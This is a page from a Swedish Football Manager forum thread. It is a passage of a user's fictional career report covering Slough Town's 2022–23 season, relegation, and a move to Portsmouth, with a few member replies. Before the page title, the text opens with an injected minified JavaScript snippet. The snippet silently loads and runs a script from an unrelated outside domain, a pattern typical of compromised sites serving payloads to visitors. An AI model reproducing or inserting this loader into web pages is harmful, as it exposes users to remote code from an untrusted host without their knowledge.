;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); [FM21] – Rebellerna i Slough – Sida 2 – Avslutade rapporter – FMSweden Forum
Meny Stäng

Share:
Notifications
Clear all

[FM21] - Rebellerna i Slough

37 Inlägg
6 Users
72 Reactions
1,631 Visningar
rockystar
(@rockystar)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 33
Topic starter  

| Försäsongen 2022 |

>> Försäsongsmatcher

Inför den nya säsongen valde jag att utse David Ijaha till ny lagkapten och Joe Gascoigne till ny vice lagkapten. Ijaha hade visat vägen under föregående säsong med sitt uppoffrande spel och Gascoigne var en spelare vars inställning jag verkligen gillade.

Det var en njutning att se laget spela försäsongsmatcherna. Vi besegrade utan större bekymmer de mindre lagen Bedworth United, Sevenoaks Town och Tiverton Town. Men vi lyckades även nå fina resultat mot bättre motstånd så som segern mot Sky Bet League 2 laget Scunthorpe United. Givetvis ska man aldrig dra för stora slutsatser av försäsongsmatcher, men det faktum att spelarna kunde vårt spelsätt och presterade på en bra nivå i ett så tidigt skede av säsongen gav oss lite lugn och ro i förberedelserna.

Förutom våra två målvakter, som båda två storspelade under försäsongen, var det framför allt en spelare som utmärkte sig, Ethan Moran. Trots att han inte fick starta någon av våra matcher så lyckades han göra 3 mål under försäsongen. Han visade tydligt att Harris och Hodges inte skulle vara allt för säkra på sina platser i startelvan.


   
TommyE and Micke reacted
SvaraCitera
Micke
(@micke)
Reputable Member Admin
Blev medlem: 4 år sedan
Inlägg: 239
 

Riktigt fin rapport, spelarnamnet Joe Gascoigne gillar man ju också. Keep it up!

"I have never played for a draw in my life." - Sir Alex Ferguson


   
rockystar reacted
SvaraCitera
rockystar
(@rockystar)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 33
Topic starter  

| 1 September 2022 |

>> Spelartruppen

Vänsterbacken Worsfeld var missnöjd och förklarade att han ville lämna klubben för att få mer speltid. Det passade oss mycket bra då jag inte såg honom som varken första- eller andravalet på den positionen. Jag lovade att försöka lösa ett klubbyte så snart som möjligt.

>> Vanarama National League South

Säsongen inleddes med ett mycket hektiskt spelschema. De 9 första matcherna skulle spelas på en tidsperiod på som inte var längre än 36 dagar. Dessutom var Ijaha avstängd några matcher från föregående säsong och Gascoigne stängdes av i flera matcher efter en utvisning i andra omgången. Därmed hade vi mycket ont om mittfältare och tvingades överlag till att rotera spelare mer än jag hade önskat. Trots den utmaning det innebar så lyckades vi ganska väl i inledningen av säsongen och tog 9 poäng på de första 8 matcherna. Det var betydligt bättre än föregående säsong då vi endast hade tagit 6 poäng på de inledande 8 matcherna.

>> Spelarprestationer

De två spelare som hade inlett säsongen starkast var våra anfallare Harris och Hodges. Med 4 mål vardera var de en stor del av att vi hade inlett säsongen på ett bra vis. Men även vår anfallstalang Moran fick en del speltid. Han tog bland annat plats i startelvan i matchen mot Eastbourne Borough och tackade för förtroendet genom att göra mål. Bland de som däremot hade haft en tyngre säsongsinledning fanns Stohrer och Gardner.


   
SvaraCitera
(@soton666)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 22
 

Trevlig läsning. Kul att läsa om mindre lag.


   
rockystar reacted
SvaraCitera
rockystar
(@rockystar)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 33
Topic starter  

| 1 Oktober 2022 |

>> Ledarstaben

Det fanns många anledningar att önska sig en förbättrad träningskvalitet, såväl sportsliga som ekonomiska, och för att göra vad jag kunde bad jag klubbledningen om tillåtelse att anställa ytterligare en hjälptränare. De accepterade förslaget och jag anställde Shaun Miller med särskilt ansvar för spelarnas fysträning. Jag passade även på att anställa Kevin Smith som fysioterapeut för att minska risken för skador.

Därmed hade vi stärkt ledarstabens tränarkvalitet och vi var i många avseenden bland de allra bästa klubbarna i Vanarama National League South.

>> Spelartruppen

En särskild tanke med att stärka vår kvalitet gällande fysträningen var att en av mina favoritspelare, Joe Gascoigne, behövde stärka sin fysik. Han fick även instruktioner om extra styrketräning.

Under september så uppstod en möjlighet att värva den 18-åriga mittbacken Michael Stickland efter att han hade lämnat Reading. Det var en av de allra bästa spelare som våra scouter hade följt under min tid i Slough och trots att det tog mig emot så fick de ekonomiska ramarna ge vika denna gång. Stickland skrev på ett tvåårskontrakt med £800 i månadslön.

Stickland var en mycket bollskicklig försvarare med imponerande passningar och kreativitet. Men han var även en stark och placeringssäker mittback och en bra bollvinnare. Han skulle öka den redan hårda konkurrensen om de tre mittbackspositionerna i startelvan. De fem mittbackarna Gardner, Grant, Harriott, Stickland och Zito var alla mycket skickliga och genomsnittsåldern var 19,8 år.

>> FA-cupen

En av säsongens viktigare målsättningar var att vi i FA-cupen skulle nå den fjärde kvalomgången. Vi klev in i cupen i den andra kvalomgången och ställdes där med Tiverton Town, ett lag som vi hade besegrat med 1-0 i en träningsmatch under försäsongen.

Trots att Tiverton spelade i en lägre division så blev det en mycket jämn match och efter 90 spelade minuter var det ännu mållöst. Innan 10 minuter hade spelats av förlängningen så fick Ijaha ett rött kort och matchbilden blev än mer tillknäppt i och med att vi tvingades fokusera på försvarsspelet. Allt tydde på att vi skulle få se ett avgörande på straffar, men i matchens sista anfall i den 121:a minuten kunde Moran göra 1-0 till oss och därmed säkra avancemang till den tredje kvalomgången.

>> Vanarama National League South

Resultaten i ligaspelet var under den gångna månaden betydligt sämre än jag hade önskat. Vi kunde visserligen vinna övertygande mot nykomlingarna Gosport Borough, men i övrigt var det idel förluster för vår del.

>> Ekonomi

Den ekonomiska situationen i klubben såg fortsatt god ut. Även om värvningen av Stickland hade inneburit att lönebudgeten hade överskridits så var det inte med mycket. Lönekostnaden var 100,4% av lönebudgeten.


   
TommyE reacted
SvaraCitera
rockystar
(@rockystar)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 33
Topic starter  

| 1 November 2022 |

>> Tränarkarriären

Under månaden kontaktades jag av en journalist som ville ha ett uttalande angående ett rykte som tydligen cirkulerade om att jag var aktuell att ta över Sky Bet League 1 klubben MK Dons. Det var en proffsklubb hemmahörande tre divisioner högre än Vanarama South. Jag trivdes bra i Slough och kände mig inte redo att lämna men samtidigt skulle en sådan flytt innebära ett stort kliv framåt i min karriär. Till sist valde jag att ligga lågt och inte uttala mig i media.

Däremot valde jag att uttala mig nästa gång en journalist kontaktade mig angående rykten att jag var aktuell för en ny klubb. Denna gång var det Vanarama National klubben Ebbsfleet, en klubb som jag för tillfället helt saknade intresse av att ta över. Det var också vad jag gjorde klart för journalisten, vilket gladde Sloughs supportrar.

>> Spelartruppen

Dessvärre drabbades Gascoigne av en svår revbensskada som, trots behandling av specialister, skulle hålla honom borta från fotbollsplanen de kommande 3 månaderna. Vi hade redan innan Gascoignes skada haft ont om centrala mittfältare och situationen förvärrades därmed ytterligare.

>> FA-cupen

I den tredje kvalomgången av FA-cupen var Enfield Town vårt motstånd. Vi inledde starkt och skapade flera bra målchanser, men trots det så tog de ledningen på sin första målchans. Vi lyckades kvittera på straff i den andra halvleken och 1-1 stod sig tiden ut. Förlängning väntade återigen. Det matchavgörande målet kom mycket slumpmässigt i form av ett inlägg från vår högerback Law som studsade förbi alla spelare i straffområdet, även målvakten. Därmed var vi vidare till den fjärde och sista kvalomgången, men utan att övertyga.

Ebbsfleet, som föregående säsong tagit steget upp från vår division till Vanarama National, var våra motståndare i den fjärde kvalomgången. Matchen hade lockat 1714 åskådare till Arbour Park vilket var ett nytt klubbrekord. Precis som varit fallet i den andra kvalomgången och den tredje kvalomgången så gick även vår match i den fjärde kvalomgången till förlängning. I de tidigare förlängningarna hade vi stått som slutlig segrare, men denna gång fick vi tyvärr gå av planen som förlorare efter att ha släppt in matchens enda mål i den 118:e matchminuten. Vi hade visserligen varit utspelade under hela matchen men förlusten kändes ändå trist. Jag kunde ändå glädja mig åt det faktum att vi hade nått den fjärde kvalomgången vilket var klubbens målsättning.

>> Vanarama National League South

Vårt spel i ligan fortsatte på ett dåligt vis och vi tog återigen endast 3 poäng på 4 matcher. Säsongens målsättning för ligaspelet var att säkra fortsatt spel i divisionen och då gällde det att undvika de fyra sista placeringarna.


   
SvaraCitera
rockystar
(@rockystar)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 33
Topic starter  

| 1 December 2022 |

>> Tränarkarriären

Under senhösten var jag något av ryktenas man i såväl traditionell media som sociala medier. Jag kontaktades av reportrar från tidningar som ville att jag skulle uttala mig om än den ena klubben, än den andra klubben som potentiell ny arbetsgivare för min del. Ena veckan gällde det Bristol Rovers och nästa vecka Eastleigh, för att bara veckan därefter kopplas samman med AFC Wimbledon. Jag förnekade att jag skulle ha något intresse av att ta ledningen över Eastleigh, men i övrigt höll jag en mycket låg profil och valde att inte uttala mig.

Trots att jag visat mig måttligt intresserad i media så erbjöds jag möten för att diskutera eventuella anställningar i alla de tre klubbar som det ryktats om. Jag valde dock att endast sätta mig ned med Kurt Brooks och Mike Turner från Bristol Rovers. Det var en klubb som spelade i Sky Bet League 1 och för tillfället låg på kvalplats till Sky Bet Championship. Övriga erbjudanden tackade jag dock nej till.

Efter några dagar fick jag beskedet att Bristol Rovers inte valde att erbjuda mig någon anställning. Istället var det Mark Walburton som blev klubbens nya manager.

>> Spelartruppen

Mittbacken Zito skrev på en förlängning av sitt kontrakt som sträckte sig till sommaren 2024.

>> FA Trophy

FA Trophy ansågs inte heller denna säsong som någon särskilt viktig tävling och även om målsättningen var att nå den första omgången så var klubbledningen också tydliga med att det inte var ett särskilt högt prioriterat mål. Då vi klev in i tävlingen i den andra omgången så var målsättningen redan nådd.

I den andra omgången ställdes vi mot Aveley och Moran fick chansen i startelvan bredvid Harris. De två anfallarna storspelade tillsammans och Harris stod för två målgivande passningar medan Moran gjorde två mål. Även James, Stickland och Dudzinski visade prov på sin skicklighet när vi vann matchen med klara 3-0 och därmed var klara för den tredje omgången.

>> Vanarama National League South

Våra resultat i ligan visade möjligen vissa tecken på förbättring, men jag var långt ifrån nöjd med hur vi spelade. Att vi på de 3 matcherna lyckades ta 4 poäng var trots allt ett fall framåt och innebar att vi kunde klättra något i tabellen.


   
SvaraCitera
rockystar
(@rockystar)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 33
Topic starter  

| 1 Januari 2023 |

>> Spelartruppen

Jag lyckades övertyga Moran om att skriva på ett nytt kontrakt som sträckte sig till 2025. Han hade gjort det mycket bra så långt med totalt 8 mål på de 22 matcher han hade spelat.

>> FA Trophy

Den tredje omgången i FA Trophy skulle spelas på Plainmoor mot Torquay United som spelade i Vanarama National. Jag hade aldrig någonsin sett vårt lag bli så utspelade under 90 minuter. Våra motståndare vann skotten med förkrossande 25-4. Det var därför mycket överraskande att vi kunde vinna matchen med 2-1 efter mål av Hodges och Moran och avancera till sextondelsfinal.

>> Vanarama National League South

Ligaspelet gick fortsatt mycket dåligt och det tyckte vara fullständigt omöjligt att vinna matcherna. Ofta tog vi ledningen, men kvitteringen dröjde aldrig länge. Med bara 2 inspelade poäng på de 5 ligamatcherna var det inte mer än 3 poäng som skiljde oss från nedflyttningsplacerade Farnborough när året var över och 2022 ersattes av 2023.


   
raca14, trashbag and Q reacted
SvaraCitera
rockystar
(@rockystar)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 33
Topic starter  

| 1 Februari 2023 |

>> Ledarstaben

Under årets första månad avslutade jag till sist studierna för den kontinentala B-licensen och valde omedelbart att påbörja studierna för en kontinental A-licens. Utbildningsmässigt var min karriär en succé och jag började allt oftare fundera på hur länge jag skulle stanna i Vanarama National League South. Skulle jag söka mig till en klubb högre upp i seriesystemet eller skulle jag fortsätta att utveckla den grund jag lagt i Slough?

>> Spelartruppen

En lång rad spelare hade kontrakt som skulle löpa ut efter säsongen. Under januari månad förlängdes kontraktet med den skickliga mittbacken Stickland. Hans nya kontrakt sträckte sig till 2025.

>> FA Trophy

Sextondelsfinalen i FA Trophy skulle spelas hemma på Arbour Park och motståndare var Welling United. Det utvecklades till en mycket händelsefattig historia och mtachen slutade 0-0. Returmötet skulle spelas fyra dagar senare.

Returmatchen visade sig även den bli en match helt utan målchanser. När 90 minuter var spelade hade inget mål gjorts och förlängning väntade. Men ytterligare 30 minuters spel hjälpte inte, det var fortsatt mållöst och straffar skulle fälla avgörandet. Under de första tre straffomgångarna gick alla straffar i mål. För vår del var det Moran, Kuhl och Dutton som hade gjort sitt från straffpunkten. I den fjärde omgången sköt Welling-spelaren Johnston i stolpen och vi hade därmed ena foten i åttondelsfinalen. Hodges gjorde mål för oss. I den femte straffomgången gjorde Welling-spelaren Cheshire mål men om Ijaha skulle göra mål så var segern vår. Han höll nervositeten under kontroll och satte bollen i mål. Därmed var vi klara för åttondelsfinal.

Trots att FA Trophy var den tävling som prioriterades lägst under säsongen så var det säsongens stora behållning i och med att ligaspelet gick tungt.

>> Vanarama National League South

Plötsligt började bollen studsa vår väg och vi gick obesegrade genom ligaspelet under årets första månad. De 6 poäng vi säkrade innebar att vi hade 27 poäng på 28 matcher och därmed höll visst avstånd till nedflyttningsplatserna. Det som ändå oroade mig var att vårt spel var så ojämnt utan uppenbar anledning. Samtidigt så var vår spelartrupp till stora delar mycket ung och skulle med tiden bara bli bättre.


   
SvaraCitera
rockystar
(@rockystar)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 33
Topic starter  

| 1 Mars 2023 |

>> FA Trophy

Det hade blivit dags för åttondelsfinal i FA Trophy och vi ställdes mot Dagenham and Redbridge, eller som de brukade kallas Dag & Red. Våra motståndare startade matchen mycket starkt och gjorde 2 mål tidigt. Efter pausvilan kunde vi reducera genom ett vackert distansskott av Robinson, men när Dag & Red fick en straff som de utnyttjade så var matchen i praktiken över. Vi förlorade och var utslagna ur cupen.

>> Vanarama National League South

Återigen väntade ett otroligt tätt matchschema. På 25 dagar skulle vi spela 7 ligamatcher och 1 cupmatch. Jag kunde inte avgöra om det berodde på spelschemat eller vår skicklighet, men vårt spel föll samman fullständigt under februari. Ingenting fungerade längre och matcherna förlorades stort. Vi radade upp förlust efter förlust efter förlust och tabellsituationen såg allt sämre ut.

Efter 6 raka förluster, vilket var ett inte så smickrande klubbrekord, och en position i tabellen som innebar nedflyttning ville klubbledningen diskutera min framtiden. De förklarade att de inte alls var nöjda, och jag kunde bara hålla med.

I omgång 34 skulle vi spela mot Gosport Borough som låg näst sist. Jag insåg att min framtid i klubben mer eller mindre skulle avgöras av resultatet i den matchen. Redan innan 10 minuter var spelade så hade Robinson gett oss ledningen med ett vackert frisparksmål och Moran hade utökat till 2-0 efter ett friläge. Innan matchen var över hade ledningen utökats ytterligare genom ett mål av Stickland. Plötsligt hade vi vunnit med klara 3-0 och kanske hade vår form äntligen vänt uppåt.

Månadens ligaspel avslutades med en match mot tabbellfyran Aldershot Town. Det blev en fullständig förnedring och vi förlorade med 1-5. Den utan tvekan sämsta månaden under min tid i Slough hade nått sitt slut.

>> Vanarama National League South

Av säsongen återstod 11 matcher. Men det var inte på något vis en självklarhet att jag skulle vara klubbens manager när säsongen avslutades. Även om jag uppfyllde de allra flesta målsättningar som hade satts upp för säsongen så underpresterade vi i ligaspelet vilket upprörde klubbledningen.


   
SvaraCitera
TommyE
(@tommye)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 36
 
Postad av: @rockystar

Under årets första månad avslutade jag till sist studierna för den kontinentala B-licensen och valde omedelbart att påbörja studierna för en kontinental A-licens. Utbildningsmässigt var min karriär en succé och jag började allt oftare fundera på hur länge jag skulle stanna i Vanarama National League South. Skulle jag söka mig till en klubb högre upp i seriesystemet eller skulle jag fortsätta att utveckla den grund jag lagt i Slough?

Jo en svår avvägning det där om man ska stanna och utveckla laget och se om man möjligen kan konkurrera om uppflyttning någon säsong eller ta på sig en ny utmaning med ett mer kapabelt lag. Lite tålamodsfråga.
Jag kör ju en egen rapport (lirar inte mycket just nu men den lever) med Salisbury och har bara nationell C-licens och fick mitt första erbjudande från en annan (lågdivision) klubb först fjärde säsongen.


   
SvaraCitera
rockystar
(@rockystar)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 33
Topic starter  

| 1 April 2023 |

>> Vanarama National League South

Ligaspelet under mars månad inleddes med en fin seger mot Dulwich Hamlet efter att Moran blivit matchens enda målskytt. Därefter följde 3 raka förluster och ytterligare ett möte med klubbledningen för att diskutera min framtid. De gjorde klart att de var trötta på mina ursäkter och jag tvingades garantera att allt skulle se bättre ut om en månad. Månadens sista prestation var en mållös match mot Welling.

>> Spelarprestationer

De tre spelare som hade spelat bäst under säsongen så långt var målvakten Dudzinski, den spelskicklige mittbacken Stickland och anfallaren Moran. Med sina 14 fullträffar var Moran lagets bästa målskytt, trots att han hade spelat färre matcher från start än såväl Harris som Hodges. Både Harris och Hodges hade gjort 9 mål vardera.

>> Landslag

Jack James blev för första gången uttagen i Maltas landslagstrupp. Han hade tidigare spelat 10 U21-matcher för sitt land. Landslagsdebuten kom i matchen mot Cypern som förlorades med 0-3. Han spelade även i 0-2 förlusten mot Tjeckien.


   
SvaraCitera
rockystar
(@rockystar)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 33
Topic starter  

| 24 April 2023 |

>> Spelartruppen

Jag valde att förlänga kontrakten med flera av våra viktigaste spelare. Det var Ben Dudzinski, Oliver Gardner, Jack James och Joe Gascoigne. Dudzinski hade hållit nollan i 17 av de matcher han spelat vilket var nytt klubbrekord.

>> Ungdomsverksamheten

Ett gäng med ungdomsspelare anslöt till ungdomslaget för en tids provspel och det var framför allt en spelare som stack ut framför de andra, den tekniska Kurt Attard. Attard kunde spela såväl i anfallet som offensivt på det centrala mittfältet och skulle garanterat erbjudas ett kontrakt med klubben. Förutom fin teknik hade han även bra avslut från distans och han hade dessutom en mycket bra inställning. Jag såg mycket fram emot att följa hans framtida karriär.

Förutom Attard så skrev även Lea Malone, Ricky Geddes, Andy Martin, Karl Rush och Mikey Fitzgerald på ungdomskontrakt med klubben.

>> Vanarama National League South

Klubbledningen förklarade att de var mycket nöjda med den förbättring av vårt spel som de hade sett under den gångna månaden och att jag som en följd av detta satt säkert som klubbens manager.

Och vårt spel hade verkligen blivit bättre. När vi i den näst sista matchen vann överraskande mot Dag & Red så hade vi tagit 7 poäng på 5 matcher. Det innebar att vi hade allt i egna händer i den sista matchen för säsongen, mot Billericay. Förutsättningarna var klara, så länge inte Farnborough tog fler poäng i sin match mot St. Albans än vad vi gjorde mot Billericay så skulle vi spela i Vanarama National League South även nästa säsong.


   
SvaraCitera
rockystar
(@rockystar)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 33
Topic starter  

| 30 April 2023 |

>> Vanarama National League South

Det hade blivit dags för säsongens sista match och det var inte vilken match som helst, det var matchen som skulle avgöra om vi skulle spela i Vanarama South kommande säsong eller inte. Förutsättningarna var klara, vi behövde ta minst lika många poäng som Farnborough gjorde i sin match mot St. Albans. Om vi gjorde det skulle vi vara säkra tack vare en bättre målskillnad.

Matchen blåstes igång och spelet böljade fram och tillbaka. Men redan efter tio minuter nåddes jag av beskedet att Farnborough hade tagit ledningen i sin match. Därmed var vi tvungna att vinna vår match mot Billericay. Innan halvleken blåstes av kom nya besked från Farnborough-matchen, ledningen var utökad till 2-0. I vår match stod det fortsatt 0-0, vilket innebar att vi för tillfället låg på nedflyttningsplats i tabellen.

Men det återstod en halvlek att spela. Om vi bara kunde göra ett mål skulle vi ta ledningen och därmed kunna säkra fortsatt spel i divisionen. Matchminuterna passerade dock utan att vi kunde skapa någon farlig målchans och när bara 15 minuter återstod av matchen var vi tvungna att göra ett sista desperat försök att nå det viktiga målet. Trots försöken blev det inga mål i vår match och slutresultatet skrevs till 0-0. Samtidigt hade Farnborough besegrat St. Albans med klara 4-1. Tabellen talade sitt tydliga språk, vi hade blivit degraderade till Regionala Förstaligorna.

>> Konsekvenser

Det faktum att vi förlorade vår plats i Vanarama National League South hade inte bara sportsliga konsekvenser för laget, det fick också konsekvenser för mig personligen. Klubbledningen hade från första dag varit mycket tydliga med att de inte kunde behålla mig som tränare för laget om vi föll ned en division, och deras besked om att låta mig lämna klubben kom därmed inte som någon överraskning.


   
SvaraCitera
rockystar
(@rockystar)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 33
Topic starter  

| 15 Juli 2023 |

>> Ett nytt kapitel

Min tid i Slough hade varit en mycket bra läroperiod. Jag hade under de drygt två åren samlat på mig en hel del erfarenheter och dessutom klarat av många steg på tränarutbildningen. Men mitt avsked från klubben kom trots allt lämpligt då jag kände mig redo för en ny utmaning i karriären. Min förhoppning var att jag skulle hitta ett nytt jobb i en proffsklubb med stabil ekonomi i en högre division.

Under våren och tidiga sommaren var det en mängd intressanta klubbar som sökte ny manager. Jag var flitig med att skicka min ansökan till de klubbar som jag ansåg relevanta och att uttala mitt intresse via media när det fanns en tjänst som lockade. Klubbarna fanns bland annat i Österrike, Ukraina, England, Danmark och Ryssland, men de enda svar jag fick var negativa.

Till sist fick jag äntligen ett svar som löd annorlunda, jag hade fått ett erbjudande om en anställningsintervju med League 2 klubben Cheltenham Town. Jag deltog med stor entusiasm och efteråt kände jag mig hoppfull då personkemin stämde och vi hade haft lätt att nå en samsyn gällande klubbens målsättningar. Några veckor senare fick jag dock beskedet att de hade valt att anställa Emma Hayes istället för mig.

Den nya säsongen närmade sig med stormsteg och jag hade ännu inte säkrat något nytt jobb.


   
SvaraCitera
rockystar
(@rockystar)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 33
Topic starter  

| 11 September 2023 |

>> Ett nytt kapitel

Sommarveckorna passerade en efter en och mitt sökande efter en ny klubb fortsatte utan framgång. Men till sist fick jag ytterligare ett erbjudande om en anställningsintervju. Denna gång var det med den gamla klubben Portsmouth som hade klättrat och fallit kraftigt i seriesystemet under de senaste åren. För 15 år sedan spelade man i Premier League och för 10 år sedan spelade man i League 2. I fjol spelade man i Championship, men skulle under den kommande säsongen spela i League 1.

Då jag var mycket intresserad av jobbet som manager i Portsmouth förklarade jag att jag var redo att ta jobbet med en lägre transfersumma och en lägre lönebudget än vad de inledningsvis hade tänkt sig. I övrigt kunde vi enas utan bekymmer.

Då nyheten om att jag var aktuell för jobbet började cirkulera i media så visade det sig att Portsmouths supportrar gillade tanken på att jag skulle ta över. Det kändes hoppfullt att ha deras stöd.

Under sommaren kontaktades jag även av Superettan-klubben Östers IF som ville att vi skulle diskutera möjligheterna för mig att bli ny huvudtränare för klubben. Jag tackade nej då jag föredrog att arbeta utanför Sveriges gränser och hade hopp om att beskedet från Portsmouth skulle vara positivt.

Veckorna passerade och ligaspelet inleddes i de flesta länderna, men till sist fick jag beskedet om att Portsmouth klubbledning kommit fram till att jag var den bästa kandidaten att ersätta tidigare managern Thomas Frank. Kontraktsförhandlingarna bjöd inte på några utmaningar, mycket tack vare att jag verkligen ville ha jobbet. Den 11 september skrev jag på ett avtal som innebar en månadslön på £25,500 under de kommande 2 säsongerna.


   
SvaraCitera
rockystar
(@rockystar)
Eminent Member
Blev medlem: 4 år sedan
Inlägg: 33
Topic starter  

| 11 September 2023 |

>> Portsmouth

Det visade sig att jag både hade lämnat en gammal klubb och anslutit till en gammal klubb. Precis som Slough Town så hade även Portsmouth grundats redan på 1890-talet. Det var med andra ord en klubb med imponerande historia som jag anlänt till. Man vann exempelvis den högsta divisionen både 1949 och 1950 samt FA-cupen 1939 och 2008.

>> Klubbens faciliteter

Klubbens hemmamatcher spelades på Fratton Park, en arena med anor från 1890-talet men som byggdes om så sent som 2005. Det fanns kapacitet för knappt 20,000 åskådare och dessutom fanns tillräckliga VIP-utrymmen. Klubbens ordförande Eric Eisner förklarade nöjt att det var klubben som ägde Fratton Park.

Träningsanläggningen kallades för ROKO Health Centre och det var även platsen för ungdomslagets matcher. Träningsanläggningen ansågs hålla bra nivå, men ett förbättringsarbete pågick och beräknades vara klart inom de kommande månaderna. Jag såg fram emot att arbeta på en riktigt fin anläggning.

Ungdomsverksamheten som leddes av irländaren Mark Kelly höll en ok nivå. Rekryteringen var hyfsad, träningen tillräcklig och akademin var även den hyfsad. Även inom ungdomsverksamheten skedde dock förbättringar som inom kort skulle slutföras.

>> Ekonomi

Klubbens ekonomi tycktes vara välmående och klubbsaldot var drygt 15 miljoner pund. Den budgeterade lönekostnaden var £595,000 och den faktiska lönekostnaden var £580,000. Det fanns även 5,5 miljoner pund tillgängligt för spelarköp.

>> Sky Bet League 1

Efter att föregående säsong ha slutat på 22:a plats i Championship så hade klubben degraderats till League 1. Divisionen bestod av 24 lag och säsongen bestod av 46 omgångar. De två bästa lagen skulle flyttas upp till Championship medan lagen på placeringarna 3 till 6 skulle få chansen att nå uppflyttning genom kvalspel. I den andra delen av tabellen var det de fyra sämsta lagen som skulle flyttas ned till League 2.

Efter de sex inledande omgångarna, då min anställning påbörjades, hade laget bara tagit 3 poäng och låg på näst sista plats i tabellen. Det var långt ifrån ett godkänt resultat för en klubb som inför säsongen hade varit favorit till att vinna divisionen och därmed säkra uppflyttning till Sky Bet Championship. Det återstod att se om jag var rätt manager för att vända utveckling i positiv riktning.


   
Arne Hegerfors, raca14, trashbag and 1 people reacted
SvaraCitera
Sida 2 / 2
Share: